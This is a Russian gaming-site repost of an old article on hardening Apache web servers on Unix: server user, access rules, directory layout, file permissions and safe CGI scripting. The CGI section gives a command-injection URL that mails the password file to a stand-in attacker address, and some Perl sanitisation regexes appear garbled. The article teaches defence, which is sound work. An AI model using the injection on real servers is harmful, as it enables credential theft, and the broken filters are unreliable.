Возможно вы искали: 'Price is Right 2010 Ed...'

May 15 2025 19:44:16
  • Как сделать 8Gamers.Ru домашней страницей?
  • Игры
    • База данных по играх
    • Игровые новости
    • Игровая индустрия
    • Обзоры на игры
    • Прохождения игр
    • Гайды к играм
    • Превью о играх
    • Игровые тизеры
    • Игровые арты
    • Игровые обои
    • Игровые скриншоты
    • Игровые обложки
    • Игровые трейлеры
    • Игровое видео
    • Вышедшие игры
    • Ближайшие релизы игр
  • Кино и ТВ
    • База данных по кино
    • Статьи о кино
    • Постеры
    • Кадры из кино
    • Кино трейлеры
    • Сегодня в кино
    • Скоро в кино
  • Комиксы и манга
    • Манга по алфавиту
    • База данных по комиксах
    • Читать онлайн комиксы
    • Читать онлайн манга
    • База персонажей
  • Читы и коды
    • Чит-коды для PC игр
    • Чит-коды для консольных игр
    • Трейнеры
    • Коды Game Genie
  • Моддинг
    • Модификации
    • Карты к играм
    • Программы для моддинга
    • Статьи о моддинге
  • Геймдев
    • Всё о создании игр
    • Список движков
    • Утилиты в помощь игроделу
    • Конструкторы игр
    • Игровые движки
    • Библиотеки разработки
    • 3D-модели
    • Спрайты и тайлы
    • Музыка и звуки
    • Текстуры и фоны
  • Рецензии
    • Игры
    • Кино
    • Аниме
    • Комиксы
    • Мангу
    • Саундтреки
  • Саундтреки
    • Лирика
  • Файлы
    • Патчи к играм
    • Русификаторы к играм
    • Сохранения к играм
    • Субтитры к кино
  • Медиа
    • Видео
    • Фото
    • Аудио
    • Фан-арты
    • Косплей
    • Фото с виставок
    • Девушки из игр
    • Рисунки
    • Рисуем онлайн
    • Фотохостинг
  • Юмор
    • Анекдоты
    • Афоризмы
    • Истории
    • Стишки и эпиграммы
    • Тосты
    • Цитаты
  • Флеш
    • Азартные
    • Аркады
    • Бродилки
    • Гонки
    • Для девочек
    • Для мальчиков
    • Драки
    • Квесты
    • Леталки
    • Логические
    • Мультфильмы
    • Открытки
    • Приколы
    • Разное
    • Спорт
    • Стратегии
    • Стрелялки
Статистика

Статей: 87772
Просмотров: 96111483
Игры
Injustice:  Gods Among Us
Injustice: Gods Among Us
...
Dark Souls 2
Dark Souls 2
Dark Souls II - вторая часть самой хардкорной ролевой игры 2011-2012 года, с новым героем, сюжето...
Battlefield 4
Battlefield 4
Battlefield 4 - продолжение венценосного мультиплеер-ориентированного шутера от первого ли...
Кино
Steins;Gate
Steins;Gate
Любители японской анимации уже давно поняли ,что аниме сериалы могут дать порой гораздо больше пи...
Ку! Кин-дза-дза
Ку! Кин-дза-дза
Начинающий диджей Толик и всемирно известный виолончелист Владимир Чижов встречают на шумной моск...
Обзоры на игры
• Обзор Ibara [PCB/PS2] 18357
• Обзор The Walking ... 18801
• Обзор DMC: Devil M... 19879
• Обзор на игру Valk... 15877
• Обзор на игру Stars! 17764
• Обзор на Far Cry 3 17948
• Обзор на Resident ... 16024
• Обзор на Chivalry:... 17508
• Обзор на игру Kerb... 17981
• Обзор игры 007: Fr... 16619
Превью о играх
• Превью к игре Comp... 17960
• Превью о игре Mage... 14464
• Превью Incredible ... 14721
• Превью Firefall 13479
• Превью Dead Space 3 16334
• Превью о игре SimC... 14730
• Превью к игре Fuse 15442
• Превью Red Orche... 15542
• Превью Gothic 3 16343
• Превью Black & W... 17354
Главная » Статьи » Разное » Некоторые аспекты безопасности Веб-серверов на Unix платформах (web security apache cgi)

Некоторые аспекты безопасности Веб-серверов на Unix платформах (web security apache cgi)

Ключевые слова: web, security, apache, cgi, (найти похожие документы)

From: Андрей Новиков <webmaster@telesputnik.ru>
Subject: Некоторые аспекты безопасности Веб-серверов на Unix платформах

Предисловие
Защищенность компьютера, на котором работает Веб-сервер, и данных, находящихся
на этом компьютере, зависит от многих аспектов. Основными из них являются:

Корректность настройки Веб-сервера.
Корректность построения дерева файловой системы.
Корректность установки прав доступа к файлам Веб-сервера.
Правильное написание CGI сценариев и программ.

Рассмотрим их по очереди.

Корректность настройки Веб-сервера
----------------------------------

На безопасность работы Веб-сервера влияют некоторые настройки, устанавливаемые
вами в файлах конфигурации. Я буду говорить в основном о сервере Apache, хотя
все замечания в равной степени применимы и к другим серверам.

Прежде всего вам необходимо правильно выбрать пользователя, под которым будет
работать Веб-сервер. Дело в том, что в Unix для того, чтобы подсоединиться к 80
порту, по умолчанию используемому в HTTP протоколе, Веб-серверу необходимо иметь
права пользователя root. Но отвечать на запросы пользователей с такими правами
очень не безопасно. Поэтому Веб-сервер порождает детей с правами другого
пользователя, которые и обрабатывают запросы пользователей. В файле конфигурации
(http.conf) необходимо указать имя пользователя, под которым будут запускаться
дочерние процессы, и группу, к которой он принадлежит. В сервере Apache за это
отвечают директивы User и Group.

Необходимо создать отдельного пользователя и группу, например apache и webstuff.
Нельзя использовать предлагаемые по умолчанию nobody:nogroup - на некоторых
системах это открывает "дыры" в защите. Ни в коем случае также нельзя запускать
Веб-сервер из под пользователя webadmin, который обычно занимается всем этим
хозяйством, т.к. он имеет права записи во все файлы (см. установку прав доступа
к файлам). Обязательно запретите login для созданного вами пользователя.

Очень важным моментом в настройке Веб-сервера является настройка файла прав
доступа (access.conf). Необходимо начать с корня дерева документов сервера и при
необходимости конкретизировать установки ниже по дереву для отдельных
подкаталогов. На мой взгляд более надежно использовать директиву , а не , т.к.
она защищает конкретные наборы файлов, независимо от того, как вы к ним попали
(ведь в серверах под Unix можно очень эффективно пользоваться линками к файлам и
директориям, делая логическую структуру дерева документов более удобной). Если
вы используете Alias, очень внимательно проанализируйте все возможные варианты
построения логического дерева (пути к файлу).

С самого начала отмените директиву построения индексов (Option Indexes). Если
вдруг пропадет файл index.html в каком-либо каталоге, сервер не построит список
всех файлов в каталоге. Такой список в некоторых случаях может содержать
нежелательные служебные файлы, которые пользователь не должен видеть. Обладание
им открывает еще одну потенциальную "дыру". Несмотря на запрет индексирования
помещайте в каждый каталог файл index.html хотя бы с пустым
(это уже паранойя, но все же...).

Разрешайте серверу следовать символьным ссылкам только если вы действительно ими
пользуетесь.

Для каталога /cgi-bin запретите все кроме ExecCGI. Проверьте, что скажет ваш
сервер, если вы запросите http://www.server.dom/cgi-bin/. Он должен послать вас
очень далеко, а не выдать список всех ваших сценариев!

Все служебные URL, такие как /server-status, /server-conf, должны быть открыты
только для вашего доступа. При этом указывайте ваш IP адрес, а не hostname, т.к.
hostname можно подделать, а IP адрес намного сложнее.


Корректность построения дерева файловой системы
-----------------------------------------------

Важно заранее очень хорошо продумать структуру каталогов. Ведь они отражают
структуру вашего узла и менять потом все очень сложно. Учитывайте, что
количество документов по одной теме будет все время расти. В каталоге не должно
быть слишком много файлов. Это затрудняет их поиск, вы можете по ошибке что-то
удалить, да и просто усложняет вам работу.

Очень важно, чтобы каталог с настройками, каталог с файлами регистрации (logs) и
каталог со сценариями находились выше дерева документов. Доступ к каталогу
сценариев должен осуществляться директивой ScriptAlias. Рекомендуется такая
структура:
site_____conf
|__logs
|__cgi-bin
|__htdocs

Очень аккуратно пользуйтесь связями, ведущими вне дерева документов. Старайтесь
ссылаться только на отдельные файлы, а не на целые каталоги. Но если это нужно,
то можно.


Корректность установки прав доступа к файлам Веб-сервера
--------------------------------------------------------

Все файлы ниже каталога site не должны принадлежать пользователю, под которым
работает сервер (apache), но должны принадлежать группе, в которую входит это
пользователь (webstuff).

Обычно файлами владеет webadmin, также принадлежащий группе webstuff. Все
каталоги и файлы должны создаваться с umask = 027, т.е. группа (читай -

Веб-сервер) должна иметь только права на чтение и исполнение, а все остальные
(не webadmin) не должны иметь никаких прав. Таким образом вам останется охранять
только login root'а и webadmin'а.


Правильное написание CGI сценариев и программ
---------------------------------------------

Одним из основных способов попасть в Ваш сервер, это воспользоваться неправильно
написанным сценарием. Существует большое количество книг по безопасным
сценариям. Я опишу только основные моменты.

Первым способом нарушить работу сценария является переполнение буфера ввода.
Никогда не указывайте размер буфера исходя из разумных соображений. Определяйте
его динамически:
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});

Неплохо также перед этим проверить $ENV{'CONTENT_LENGTH'} и уменьшить ее до
некоего разумного предела.

Вторым важным моментом является внедрение команд ОС в возвращаемые сценарию
переменные. Возьмем пример:
Пусть у на в сценарии будет строка (@usernames - массив имен)
system "finger @usernames 2>&1";

Если мы вызовем такой сценарий строкой
http://www.yoursite.ru/cgi-bin/bad_finger.pl?andy+bob
то все будет замечательно. Но, если его вызвать строкой
http://www.yoursite.ru/cgi-bin/bad_finger.pl?`mail+badguys@hackers.org+ то ваш
файл паролей улетит к "нехорошим парням".

В связи с этим только в крайних случаях используйте такие команды, как system(),
exec() и eval(). Всегда проверяйте значения переменных на наличие метасимволов и
удаляйте их. Например так:
$value =~ tr/'"tnr/<>|;//d;
$value =~ s///g;

Ну а самым надежным способом является проверка каждого поля на точный шаблон
данных, которые вы ожидаете получить. Например, если вы запросили почтовый
индекс, проверьте его строкой:
$zip =~ /^d{6}$/

а если запросили адрес электронной почты, строкой:
$email=~s#(w+(-|.|))+@(w+(-|.|))+(ru|su|be|ca|cz|ee|fi)##io;


Заключение
----------

Следуя этим нехитрым правилам вы значительно обезопасите ваш сервер от
поползновений "нехороших парней", как их мило называют в зарубежной литературе.
Главное, это помнить основной принцип обеспечения безопасности - запретите ВСЕ,
а потом разрешайте только то, что Вам ДЕЙСТВИТЕЛЬНО необходимо.



Ждем ваших писем, так как благодаря им, страничка становится интересней и
полезней.
E-mail: unix@asphaltstorm.da.ru
Андрей Новиков
904 Прочтений •  [Некоторые аспекты безопасности Веб-серверов на Unix платформах (web security apache cgi)] [08.05.2012] [Комментариев: 0]
Добавил: Ukraine Vova
Ссылки
HTML: 
[BB Url]: 
Похожие статьи
Название Добавил Добавлено
• Некоторые аспекты безопасности Веб-... Ukraine Vova 08.05.2012
Ни одного комментария? Будешь первым :).
Пожалуйста, авторизуйтесь для добавления комментария.

Проект входит в сеть сайтов «8Gamers Network»

Все права сохранены. 8Gamers.NET © 2011 - 2025

Статьи
Рецензия на Pressure
Рецензия на Pressure
Чтобы обратить на себя внимание, начинающие маленькие разработчики, как правило, уходят в жанры, ...
Рецензия на Lost Chronicles of Zerzura
Рецензия на Lost Chron...
Игры, сделанные без любви и старания, похожи на воздушный шар – оболочка есть, а внутри пусто. Lo...
Рецензия на The Bridge
Рецензия на The Bridge
«Верх» и «низ» в The Bridge — понятия относительные. Прогуливаясь под аркой, можно запросто перей...
Рецензия на SimCity
Рецензия на SimCity
Когда месяц назад состоялся релиз SimCity, по Сети прокатилось цунами народного гнева – глупые ош...
Рецензия на Strategy & Tactics: World War 2
Рецензия на Strategy &...
Название Strategy & Tactics: World War II вряд ли кому-то знакомо. Зато одного взгляда на ее скри...
Рецензия на игру Scribblenauts Unlimited
Рецензия на игру Scrib...
По сложившейся традиции в информационной карточке игры мы приводим в пример несколько похожих игр...
Рецензия на игру Walking Dead: Survival Instinct, The
Рецензия на игру Walki...
Зомби и продукция-по-лицензии — которые и сами по себе не лучшие представители игровой биосферы —...
Обратная связь | RSS | Донейт | Статистика | Команда | Техническая поддержка